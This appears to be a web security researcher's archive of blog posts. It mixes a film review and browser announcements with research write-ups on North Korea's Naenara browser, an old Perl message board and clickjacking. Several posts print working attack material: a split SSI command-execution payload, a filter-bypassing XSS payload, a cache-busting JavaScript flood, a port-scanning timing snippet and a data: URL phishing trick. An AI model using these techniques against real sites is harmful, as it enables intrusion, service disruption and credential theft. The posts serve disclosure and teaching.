Author Archives: Robert Hansen

About Robert Hansen

Robert Hansen is the Vice President of WhiteHat Labs at WhiteHat Security. He’s the former Chief Executive of SecTheory and Falling Rock Networks, which focused on building a hardened OS. Mr. Hansen began his career in banner click fraud detection at ValueClick. Mr. Hansen has worked for Cable & Wireless doing managed security services, and eBay as a Sr. Global Product Manager of Trust and Safety. Mr. Hansen contributes to and sits on the board of several startup companies. Mr. Hansen has co-authored "XSS Exploits", published by Syngress, and wrote the eBook "Detecting Malice." Robert is a member of WASC, APWG, IACSP, and ISSA, and contributed to several OWASP projects, including originating the XSS Cheat Sheet. He is also a mentor at TechStars. His passion is breaking web technologies to make them better. Robert can be found on Twitter @RSnake.

The Imitation Game – A Review

Warning: Spoiler alert!

I went to watch “The Imitation Game” this weekend on a bit of a whim. I know Alan Turing’s story rather well – having spent a lot of time in computer security will do that to you. Overall I thought the movie was really good – the acting, the writing, and the general historicity were all strong.

Pros:

  • The movie spent a lot of time talking about his personal life, and what led up to his suicide. I’d argue that this was as much a movie about the father of computers as it was about the historical (and unfortunately current) marginalization and criminalization of homosexuality.
  • I was impressed by how the movie explained how reduction of keyspace works, in rather plain English and with simple examples. The math may be beyond the average person, but they managed to make the concept accessible.
  • They mention the Turing test – though thankfully there were no CAPTCHAs in sight.
  • The movie spent quite a long time explaining why you cannot use a single signal to make any decisions, or the adversary will switch tactics and you’ll lose that one signal. I try to make this point all the time, and yet I still see people doing things like blocking countries at the firewall by IP address. If you are in security and you take nothing away from this movie, let it be this – do not use a single signal to identify and stop fraud/hacking. You’re hurting the ecosystem by doing so. Yes, you.

There were a couple cons though… Some cons that actually made me cringe.

Cons:

  • At one point in the movie Alan Turing made the bear-in-the-woods joke. Just about the time my eyes started rolling, the audience burst into laughter – at which point I realized I was extremely jaded and should probably learn to live a little, hug a tree, run like a child or generally do something other than wince at old security jokes. But the reason I hate this joke is that it presumes you can leave the woods once the bear has eaten your friend. Unless you plan to close up shop and leave the Internet, this analogy has always been a very dangerous one. Bears get stronger, and will get hungry again, and if you’re relying on running faster than an adversary who is dead, you’re using the wrong analogy. I prefer the prairie dog analogy if you’re looking for silly analogies.
  • A big motivator throughout the movie was that at the end of the day a buzzer went off, meaning that the Nazis had changed their encryption keys. So yesterday’s keys were “useless” and anything they had done had to be scrapped if they couldn’t complete it by midnight. Though it’s an interesting plot device, it really doesn’t work that way. Decryption doesn’t stop at the end of the day just because the key changes. If the adversary has the ciphertext and there is nothing ephemeral about the key, it can still be decrypted. Now if you’re going to make the point that the data loses value the longer it takes to decrypt – yes, I’m on board with that. But the movie didn’t explain that at all.
  • They don’t really talk about Turing’s other accomplishments, like the halting problem – which more or less describes the problem with blacklists and all kinds of other technologies. As someone who breaks crappy blacklists for a living, I find it one of his accomplishments most useful to my daily life. I really wanted to hear them mention it at least once, like they did with the Turing test. Alas!

I’d also point out that there were some other controversies about the movie’s historical accuracy that didn’t jump out at me as I watched it. Anyway, it was a really wonderful movie, despite the cons. I’d highly recommend it to people who want to know a bit more about our roots, and to get a bit more familiar with some of the core concepts that have brought us to where we are today. I love that we’re seeing more movies about real heroes and not the typical Hollywood-manufactured superhero.

Aviator Open Source (Day 1)

We got some interesting feedback from Google in just the first 24 hours of open sourcing Aviator to the community. Interestingly, one of our initial barometers of success was getting to the point where Google had to talk about us, so today was a milestone for us!

The post makes some interesting points about the architecture of our fixes, noting that we are behind Google on patches and that there are software security issues. Let me make it clear: we never claimed to be as fast as Google at releasing updates. In fact, that would be nearly impossible for a company of our size. Google gets the benefit of making in excess of $50 billion a year from ads by marketing its users to advertisers. Therefore, Google has a lot of vested interest in keeping the browser up to par and capable of delivering more ads to those users. To say we are outmatched is an understatement.

We decided to go open source with Aviator and thereby seek assistance from the community. All this being said, we would like to take a moment to respond to some of the points made in the post, as well as to the advice that was shared:

  1. Yes, there are bugs in our code, just like there were bugs that we inherited from the Chromium code base.
  2. Yes, it is perhaps not as elegant a code base as Google Chrome’s; however, Chrome has bugs as well. That’s the nature of such a complex project. The nice thing about bugs is that they can be fixed.
  3. Advising users not to use Aviator misses the bigger picture. Telling people that if they use Chrome, add Disconnect, and change some privacy settings they’ll get the same thing as Aviator is not at all accurate. We have made changes in Aviator that go beyond configuration, such as stopping referring URLs from being sent cross-domain and always running in private mode by default. But far more importantly, when we talk to average users it becomes clear that consumers can’t actually do what the post is suggesting. Most people do not know the first thing about Disconnect and, therefore, don’t know what they need to do to add it. Our argument all along has been that consumers need better options by default. They don’t even know what to search for to start learning how to protect themselves.

Our reasoning for making Aviator open source was two-fold:

  1. We wanted to be honest with our users and give them a chance to see that we don’t have anything up our sleeves and that we are not (nor were we ever) hiding anything from them. Going open source is painful, but it is good for project transparency, something Google has long refused to do with Chrome. Chrome is not open source.
  2. We wanted to solve Google’s primary issue with us – the lack of development resources necessary to deliver the browser in a timely manner. That’s absolutely a real issue and we have never claimed otherwise. By making it available to the community, we believe that more time and resources will be put towards continuing to improve it and we are excited to see where the community takes it next.

The core issue in all of this is that we set out to create a browser that would provide security and privacy settings by default. We believe that we made very good strides in that effort and when issues around those settings were brought to our attention, we actively made changes, something that Google has been unwilling to do.

I won’t lie, going open source has been hard and only with the help of the community will Aviator continue to improve. It is now up to the community to decide if they’d rather hand over their privacy when they search using other browsers, or stand behind a project that we believe has the user’s best interests as a primary motivator. Only time will tell.

North Korea’s Naenara Web Browser: It’s Weirder Than We Thought

Naenara Browser is the DPRK’s version of Firefox that comes built into Red Star OS, the official operating system of North Korea. I recently got my hands on Naenara Browser version 3.5. My first impression on playing with it is that this is one ancient version of Firefox – like maybe more than a half dozen major revisions out of date? It’s hard to tell for sure from a cursory check, but the menus remind me of something I used to use 5+ years ago. That’s not too surprising; it’s tough to maintain a browser and update it all the time, especially with such a small team devoted to the project, as I’m sure they have a lot of other things going on.

When I first saw an image of the browser I was awestruck to see that it made a request to an address (http://10.76.1.11/) upon first run. That may not mean much to someone who doesn’t deal with the Internet much, but it’s a big deal if you want to know how North Korea’s Internet works.

If you want to send a request to a web address across the country, you need a hostname or an IP address. Hostnames convert to IP addresses through something called DNS. So if I want to contact www.whitehatsec.com, DNS will tell me to go to 63.128.163.3. But certain addresses, like those that start with "10.", "192.168." and a few others, are reserved and meant only for internal networks – they are not designed to be routable on the Internet. This is sometimes used as a security mechanism to allow local machines to talk to one another when you don’t want the traffic to traverse the Internet.
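For reference, the reserved ranges are easy to check for. Here’s a tiny illustrative snippet (my own sketch, nothing from Naenara itself) that tests whether an IPv4 address falls in RFC1918 private space:

// RFC1918 private, non-routable IPv4 ranges.
function isPrivateIPv4(ip) {
  var p = ip.split('.').map(Number);
  return p[0] === 10 ||                                 // 10.0.0.0/8 - the block the DPRK appears to use
         (p[0] === 172 && p[1] >= 16 && p[1] <= 31) ||  // 172.16.0.0/12
         (p[0] === 192 && p[1] === 168);                // 192.168.0.0/16
}

isPrivateIPv4('10.76.1.11');   // true  - not reachable from the public Internet
isPrivateIPv4('63.128.163.3'); // false - a public address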

Here’s where things start to go off the rails: what this means is that all of the DPRK’s national network is non-routable IP space. You heard me; they’re treating their entire country like some small to medium business might treat their corporate office. The entire country of North Korea is sitting on one class A network (16,777,216 addresses). I was always under the impression they were just pretending that they owned large blocks of public IP space from a networking perspective, blocking everything and selectively turning on outbound traffic via access control lists. Apparently not!

But it doesn’t stop there! No! No sirrreee… I started digging through their configuration settings and here are some gems:

  1. They built their own version of the unique-key tracking system that Google uses. That means the microtime of installation is sent to the mothership every single time someone pulls down the anti-phishing and anti-malware lists (from 10.76.1.11) in the browser. This microtime is easily enough information to decloak people, which is presumably the same reason Google built it into its browser.
  2. All crash reports are sent to the mothership (10.76.1.11). So every time the browser fails for some reason they get information about it. Useful for debugging and also for finding exploits in Firefox, without necessarily giving that information back to Mozilla – a U.S. company.
  3. All news feeds go back to the mothership via a specially crafted URL: http://10.76.1.11/naenarabrowser/rss/?url=%s At first it was unclear whether that actually does anything, since we can’t see what’s behind that IP address, but it looks like it probably does act as a feed aggregator.
  4. Strangely, the browser adds ".com" instead of ".com.kp" as a suffix when it can’t find something. It’s odd because it means the browser might, in some cases, accidentally contact external hosts when someone inside the country mistypes a hostname. A bad design choice, but perhaps meant for usability, since most things live on .com.
  5. There are quite a few references to “.php” on the mothership website. I would be unsurprised if most things on it were written in PHP.
  6. Then I spotted this little number: http://10.76.1.11/naenarabrowser/%LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ This is the warning that pops up when users turn on geolocation. But here’s the really crazy part: if you remove the DPRK specific URL part and just leave it as %LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ and substitute %LOCALE% with “ko” you end up on Mozilla’s site translated into Korean. Could the mothership be acting as a proxy? Is that how people are actually visiting the Internet – through a big proxy server? Can that really be true? It kind of makes sense to do it that way if you want to allow specific URLs through but not others on the same domain. Hm!
  7. More of the same. This time the safe browsing API that Google supports to find phishing/malware stuff — http://10.76.1.11/naenarabrowser/safebrowsing.clients.google.com/safebrowsing/diagnositc?client=%NAME%&hl=%LOCALE%&site= — if you remove the preceding part of the URL and fill in the variables it’s a real site. And there are a bunch more like this.
  8. Apparently they allow some forms of extensions, plugins and themes, though it’s not clear if this is the whole list or their own special brand of allowed add-ons: http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/extensions/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/plugins/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/themes/

  9. Apparently all of the mail from the country goes through the single mothership URL. It’s very strange to build it this way, and obviously vulnerable to man-in-the-middle attacks, sniffing and so on, but I guess no one in the DPRK has any secrets, or at least not over email: http://10.76.1.11/naenarabrowser/mail/?To=%s I also found a reference to "evolution" with regard to mail, which means there is a good chance North Korea is using the Evolution mail client for the whole country.

  10. Same thing with calendaring? So many sensitive things end up in calendars – passwords, Excel spreadsheets, etc. – and it’s still very odd that they haven’t bothered using HTTPS internally: http://10.76.1.11/naenarabrowser/webcal/?refer=ff&url=%s

  11. This one blew my mind. Either it’s a mistake or a bizarre quirk of the way the DPRK’s network works, but the wifi geolocation URL still points to https://www.google.com/loc/json – not only is there no way for this to work, since Google hasn’t driven through the country with their wifi cars and the URL sits on the public Internet rather than going through their proxy of doom, but it’s also over HTTPS, meaning that even if it could be contacted, the DPRK might have a hard time seeing what is being sent. Would they even allow outbound HTTPS? More questions than answers, it seems.
  12. The official Naenara search function isn’t Google, and it’s not even clear if it’s a proxy or not. But one thing makes me think it might be – it’s in the UTF-8 charset, and not something you might expect like BIG5 or ISO-2022-KR or SHIFT_JIS. http://10.76.1.11/se/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&keyword= But wait a tick – after a little digging I found a partial match on the URL: /search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1 And where did I find this? Google. Are they proxying Google results? I think so! That means that, depending on what Google can put on those pages, they technically can run JavaScript and read the DPRK’s email/calendars, etc. using XMLHttpRequest, since they are all on the same domain (see the sketch after this list). Whoops!

  13. In looking around at the certificates that they support, I was not surprised to find that they accept no certificates as valid other than their own. That means it would be trivial for them to man-in-the-middle any outbound HTTPS connection, so even if they do allow outbound access to Google’s JSON location API it wouldn’t help, because the connection and its contents can be monitored by them. Likewise, no other government can man-in-the-middle any connections that the North Koreans make (I say that a bit tongue in cheek, because of course they can according to the Wikileaks docs, but this probably makes the DPRK feel better – and more importantly, they probably don’t know how to do it the way the NSA does, so they have to rely on draconian, Internet-breaking designs like this).

  14. The browser updates automatically, without letting the user disable that function. That’s actually a good security measure, but given how old this browser is, I doubt they use it often; it’s probably not designed to protect the user so much as to let the government quickly install malware should they feel the need. Wonderful.
  15. Even if the entire Internet is proxied through North Korean servers, and even if the user agent strings are filtered by the proxy, an adversary can still identify a Naenara user in JavaScript via navigator.userAgent. The user agent string is "Mozilla/5.0 (X11; U; Linux i686; ko-KP; rv: 19.1br) Gecko/20130508 Fedora/1.9.1-2.5.rs3.0 NaenaraBrowser/3.5b4", so if you see that string in JavaScript you could target North Korean users rather easily (see the sketch after this list).
  16. Although Red Star OS does lock things down – the file manager only shows you a few directories, the command-O (open) feature is disabled, the omnibar is removed and so on – it’s still possible to do whatever you want. Using the browser, users can go to file:/// to view files, and they can write their own JavaScript using javascript: directives, which gives them just about any access they want if they know what they’re doing. Chances are they don’t, but despite the military’s best efforts, Red Star OS actually isn’t that locked down from a determined user’s perspective.
  17. The Snort intrusion detection system is installed by default. It is either used as an actual security mechanism, as it was designed, or it could be re-purposed as a way to constantly snoop on people’s computers and see what they do when they use the Internet. Even if it didn’t necessarily phone home, the DPRK soldier who broke down your door could fairly easily do forensics and see everything you had done, without relying on any IP correlation at the mothership. So using your neighbor’s wifi isn’t a safe alternative for a political dissident running Red Star OS.
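To make points 12 and 15 a bit more concrete, here is a rough, untested sketch of what a page served through the 10.76.1.11 proxy could do. The paths come from the config strings above, but everything else is my own assumption rather than anything observed running on Red Star OS:

// Hypothetical code an attacker (or Google, if its results really are proxied)
// could serve to a Naenara user. Untested; paths are assumptions based on the
// browser's config strings.
if (/NaenaraBrowser/.test(navigator.userAgent)) {
  // Point 15: the user agent string is visible to JavaScript even if the
  // proxy rewrites or strips HTTP headers.
  var xhr = new XMLHttpRequest();
  // Point 12: search, mail and calendar all hang off the same 10.76.1.11
  // origin, so a same-origin request to the webmail path would not be
  // blocked by the same-origin policy.
  xhr.open('GET', '/naenarabrowser/mail/', true);
  xhr.onload = function () {
    // The response could then be read, scraped or exfiltrated.
    console.log(xhr.responseText.length + ' bytes of same-origin content');
  };
  xhr.send();
}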

My ability to read North Korean is non-existent, so I had to muddle my way through this quite a bit, but I think we have some very good clues as to how this browser – and, more importantly, North Korea’s Internet – works, or doesn’t, as the case may be.

It is odd that they can run all of this off of one IP address. Perhaps they have some load balancing behind it, but ultimately running everything for a whole country off of a single IP address is bad for many reasons. Spreading things out with DNS would be far more resilient, but it would also make things slower, in a country where Internet connectivity is probably already pretty slow. If I were to guess, the DPRK probably uses a proxy and splits core functions off by URL to various clusters of machines. A single set of F5s could easily handle this job for the entire country. It would be slow, but it doesn’t seem the country cares much about the comforts of fast Internet anyway.

Ultimately the most interesting takeaway for me personally was the lengths North Korea goes to in limiting what its people get to do, see and contribute to – censorship at the browser and network level, embodied in the OS called Red Star 3.0. It’s quite a feat of engineering. Creepy and cool. Download the Red Star OS here.

Aviator Going Open Source

One of the most frequent criticisms we’ve heard at WhiteHat Security about Aviator is that it’s not open source. There were a great many reasons why we didn’t start off that way, not the least of which was getting the legal framework in place to allow it, but we also didn’t want our efforts to be distracted by external pressures while we were still slaving away to make the product work at all.

But now that we’ve been running for a little more than a year, we’re ready to turn over the reins to the public. We’re open sourcing Aviator to allow experts to audit the code and also to let industrious developers contribute to it. Yes, we are actually open sourcing the code completely, not just from a visibility perspective.

Why do this? I suspect many people just want to be able to look at the code, and don’t have a need to – or lack the skills to – contribute to it. But we also received some really compelling questions from people active in the Tor community who expressed an interest in using something based on Chromium, and who also know what a huge pain it is to make something work seamlessly. For them, it would be a lot easier to start with a more secure browser that had already removed a lot of the Google-specific anti-privacy stuff than to re-invent the wheel. So why not Aviator? Well, after much work with our legal team the limits of licensing are no longer an issue, so that is now a real possibility. Aviator is now BSD (free as in beer) licensed!

So we hope that people use the browser and make it their own. We won’t be making any additional changes to the browser; we’ll still sign the releases, QA them and push them to production, but the code itself will be entirely community-driven. If the community likes Aviator, it will thrive, and now that we have a critical mass of technical users and people who love it, it should be possible for it to survive on its own without much input from WhiteHat.

As an aside, many commercial organizations discontinue support of their products, but they rarely take the step of open sourcing them. This is how Windows XP dies a slow death in so many enterprises, unpatched, unsupported and dangerously vulnerable. This is how MMORPG video games die or become completely unplayable once the servers are dismantled. We also see SaaS companies discontinue services and allow only a few weeks or months for mass migrations without any easy alternatives in sight. I understand the financial motives behind planned obsolescence, but it’s bad for the ecosystem and bad for the users. This is something the EFF is working to resolve and something I personally feel all commercial enterprises should do for their users.

If you have any questions or concerns about Aviator, we’d love to hear from you. Hopefully this is the browser “dream come true” that so many people have been asking for, for so long. Thank you all for supporting the project and we hope you have fun with the code. Aviator’s source code can be found here on Github. You don’t need anything to check it out. If you want to commit to it, shoot me an email with your github account name and we’ll hook you up. Go forth! Aviator is yours!

#HackerKast 14 Bonus Round: Canadian Beacon – JavaScript Beacon and Performance APIs

In this week’s bonus footage of HackerKast, I showed Matt my new JavaScript port scanning magic that I dubbed “Canadian Beacon” because it uses the new Beacon API. It was either that or Kevin Beacon – I had to make a tough choice with my puns. It utilizes both the performance API and the beacon API.

It shows how you can use iframes and performance APIs to do basically the same thing we used to be able to do with onload event handlers on iframes of yester-year.
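The actual Canadian Beacon demo is linked below, but the timing trick behind it looks roughly like this (a simplified sketch of the general idea, not the demo’s code, and with a made-up internal address):

// Probe an internal address with an image request and time how long the
// attempt takes. A quick failure usually means something answered (e.g. the
// connection was refused), while a long hang usually means nothing is there.
function probe(url, callback) {
  var start = performance.now();
  var img = new Image();
  var finish = function () {
    callback(url, performance.now() - start);
  };
  img.onload = finish;   // a real image came back - definitely alive
  img.onerror = finish;  // errors are where the timing signal lives
  img.src = url;
}

probe('http://192.168.1.1/', function (url, ms) {
  console.log(url + ' answered (or failed) in ' + ms + 'ms');
});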

Not a huge deal, because we can do this in a bunch of different ways already, but it shows how easy it is to do JavaScript port scanning; and even if someone bothers to shut one variant down, this and other variants will take their place. This is one of the major reasons Aviator has chosen to break access to RFC1918 from the Internet.

Only a few browsers appear to be vulnerable – Chrome and apparently Firefox – though I only got it working in Chrome. If you want to see a demo you can check out Canadian Beacon here.

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to take a look at the extensive collection of vulnerabilities that they have gathered over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid-2000s. However, one thing that struck me as very odd is that we have been seeing a downward trend in reported web application vulnerabilities since 2008:

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are), here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogeneous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, the people who use it are less likely to switch to something new, which means there is less pressure for incumbent code to be replaced and new frameworks are less likely to be adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, thereby obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, with attackers focusing on custom web application code (e.g. your local bank, PayPal, Facebook) rather than open source code used by many websites. Those vulnerabilities wouldn’t be reported in data like this, as vulnerability databases do not track site-specific issues. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves far enough where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The presence of more bug bounties, where researchers get paid for disclosing their newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is an interesting trend and should be watched carefully. It could be a hybrid of a number of these issues as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit not expressed in the data above: there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were "web related" (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code), context-dependent attacks (e.g. tricking a user into clicking a malicious link) are still a leading source of compromise, at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common as, or even more common than, they have ever been. Said another way: compromises are flat or even up, while disclosures of new remotely exploitable web application vulnerabilities are down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people don’t seem to understand how this works, or even that it’s possible, despite multiple attempts to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find, though, is that heavily database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, for example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests, using different parameter value pairs each time to bypass caching servers like Varnish. Ultimately it’s never a good idea for an adversary to use this kind of code directly, because the flood would come from their own IP address. Instead, it is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.
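For the curious, the general shape of the idea looks something like this (a stripped-down sketch, not the actual FlashFlood code; the target URL and request rate are placeholders):

// Fire off requests with a unique query string each time so that caching
// layers such as Varnish treat every request as a brand new resource and
// pass it through to the (expensive) database-backed page behind them.
function flood(target, requestsPerSecond) {
  setInterval(function () {
    var bust = Date.now() + '.' + Math.random();  // different parameter value every time
    new Image().src = target + '?cachebust=' + bust;
  }, 1000 / requestsPerSecond);
}

// e.g. flood('http://example.com/some-heavy-page', 20);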

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid-1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of our modern knowledge of web application security to 20-year-old tech? So I took a look at WWWBoard. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, I can see there have been a number of vulns found in it over the years – four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it’s actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past a Perl regex if you allow nulls. But that second substitution makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit so you had to break it into two chunks that execute together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention that Matt’s project is on its deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browsers more reliably than SSI does on websites.
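To make both bypasses concrete, here’s a small sketch (in JavaScript rather than the original Perl, but with equivalent regexes) showing that none of these payloads match the filters on their own, while the re-assembled page still ends up with a complete SSI directive or a live tag:

// Equivalents of wwwboard.pl's substitutions, translated to JavaScript regexes.
function filter(value) {
  value = value.replace(/\0/g, '');              // strip NULL characters
  value = value.replace(/<!--(.|\n)*-->/g, '');  // strip complete <!-- ... --> blocks
  value = value.replace(/<([^>]|\n)*>/g, '');    // strip complete <...> tags
  return value;
}

var subject = '<!--#exec cmd="ls -al" echo=\'';
var body = "' -->";

// Each field survives untouched, because neither contains a complete comment
// block or a complete tag on its own.
console.log(filter(subject) === subject); // true
console.log(filter(body) === body);       // true

// But once the board stitches subject and body back into the same page, the
// server sees a complete, executable SSI directive spanning the two:
console.log(filter(subject) + ' ... ' + filter(body));
// <!--#exec cmd="ls -al" echo=' ... ' -->

// The XSS case works the same way: with no closing '>', the tag regex never matches.
var xssBody = '<img src="" onerror=\'alert("XSS");\'';
console.log(filter(xssBody) === xssBody); // true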

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in long-forgotten but still functional corners all over the web. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s really fascinating to see how bad things really were, and how little security there really was, when the web was in its infancy.

#HackerKast 11 Bonus Round: The Latest with Clickjacking!

This week Jeremiah said it was my turn to do a little demo for our bonus video, so I went back and decided to take a look at how Adobe had handled clickjacking in various browsers. My understanding was that they had done two things to prevent attackers from tricking users into granting access to the camera and microphone. The first was that they wouldn’t allow the movie to sit in a 1×1 pixel iframe that would otherwise hide the permissions dialog.

My second understanding was that they prevented pages from changing the opacity of the Flash movie or the surrounding iframe, so that the dialog couldn’t be obscured from view. So I decided to try it out!

It turns out that hiding it from view using opacity is still allowed in Chrome. Chrome has chosen to prevent the user from being duped with a permissions dialog that comes down from the ribbon, which is a fairly good defense. I would even argue that there is nothing exploitable here. But just because something isn’t exploitable doesn’t mean it’s clear to the user what’s going on, so I decided to take a look at how I would social engineer someone into giving me access to their camera and microphone.

So I created a small script that pops open the victim domain (say https://www.google.com/) so that the user can look at the URL bar and see that they are indeed on the correct domain. Popups have long been blocked, but only automatic ones; popups that are user-initiated are still allowed and "pop" up into an adjacent tab. Because I still have a reference to the popup window from the parent, I can easily send it somewhere other than Google after some time elapses.

At this point I send it to a data: URL, which allows me to inject content onto the page. A little trick makes the browser look an awful lot like it’s still on Google, which makes this super useful for phishing and other social engineering attacks, though not necessarily a vuln either. The URL basically claims that the charset is "https://www.google.com/" followed by a bunch of spaces, instead of "utf-8" or whatever it would normally be. That makes it look an awful lot like you’re still on Google’s site, but you are in fact seeing content from ha.ckers.org. So yeah, imagine that being a login page instead of a clickjacking page and you’ve got a good idea how an attacker would be most likely to use it.
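Pieced together, the flow looks roughly like this (a reconstruction of the concept rather than the demo’s actual code; the element id and timings are placeholders, and current browsers have since blocked top-level navigation to data: URLs, so treat it as historical):

// The popup has to be user-initiated, so hang it off a click handler.
var win;
document.getElementById('innocent-link').onclick = function () {
  // 1. Open the real site so the victim sees the expected URL in the bar.
  win = window.open('https://www.google.com/', '_blank');

  // 2. We kept a reference to the window, so we can redirect it later,
  //    long after the victim has stopped looking at the address bar.
  setTimeout(function () {
    // 3. The "charset" is really the victim URL plus a pile of encoded
    //    spaces, so the visible part of the data: URL resembles Google.
    win.location = 'data:text/html;charset=https://www.google.com/' +
                   new Array(40).join('%20') +
                   ',<h1>Attacker-controlled content (fake login, Flash clickjack, etc.)</h1>';
  }, 15000);
};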

At that point the user is presented with a semi-opaque Flash movie and asked to click twice (once to instantiate the plugin and once to allow permissions). Typically if I were really doing this I would host it on a domain like “gcams.com” or “g-camz.com” or whatever so that the dialog would look like it’s trying to include content from a related domain.

The user is far more likely to allow Google to have access to the user’s camera and microphone than ha.ckers.org, of course, and this problem is exacerbated by the fact that people are accustomed to sites including tons of other domains and sub-domains of other companies and subsidiaries. In Google’s case, googleusercontent.com, gstatic.com etc… are all such places that people have come to recognize and trust as being part of Google, but the same is true with lots of domains out there.

Anyway, yes, this is probably not a vuln, and after talking with Adobe and Chrome they agree, so don’t expect any sort of fixes from what I can gather. This is just how it works. If you want to check it out you can click here with Chrome to try the demo. I hope you enjoyed the bonus video!

Resources:
Wikipedia: Clickjacking

Anonymity or Accountability?

Over a decade ago, when I was just starting in the computer security scene, I went to a conference for managed security services providers as the sole representative for my company. Near the end of the day-long conference there was a large discussion in which people were asked, “If you could change one thing with a magic wand to have the biggest impact on security, what would it be?”

When it finally got to me, I said the only thing that came to mind, “Attribution.” I explained, “If I had a magic wand and could change anything to have the largest impact on security, I’d make it so that everything on the Internet could be attributed to people so that we could have accountability. If you knew the packet you sent would be tagged with the information necessary for someone to track you down, you’d be extremely unlikely to commit any crimes using the Internet.”

I know it’s impossible to do that, but it was a magic wand after all. But that’s not the end of the story. Over the years I have become a privacy "guy," inasmuch as I take people’s privacy seriously. However, I also have one foot squarely in the world of banking, finance, retail and so on – where attribution is hugely important for security and also, as an unintended consequence, *ahem* marketing. So as much as I’d love to have people live in a free and open society, we all know what a bunch of jerks people can be when they know there’s nothing at risk when they break the law.

On the flip side, 100% attribution is terrible for privacy when you’re not doing anything illegal, or if you are a political dissident. The very last thing our forefathers wanted when they were talking amongst themselves in pubs on the East Coast, considering creating a new nation, was attribution. They saw fit to write amendments to the Constitution to limit unlawful searches and seizures, and to protect freedom of speech.

So on one hand you have freedom and on the other hand you have safety. I have taken to asking people: “If you had to choose only one, which would it be? Accountability or Anonymity? Do you ever want there to be a way for you to do something anonymously or not? Do you ever want to be at risk of not finding someone who had committed a crime or not?”

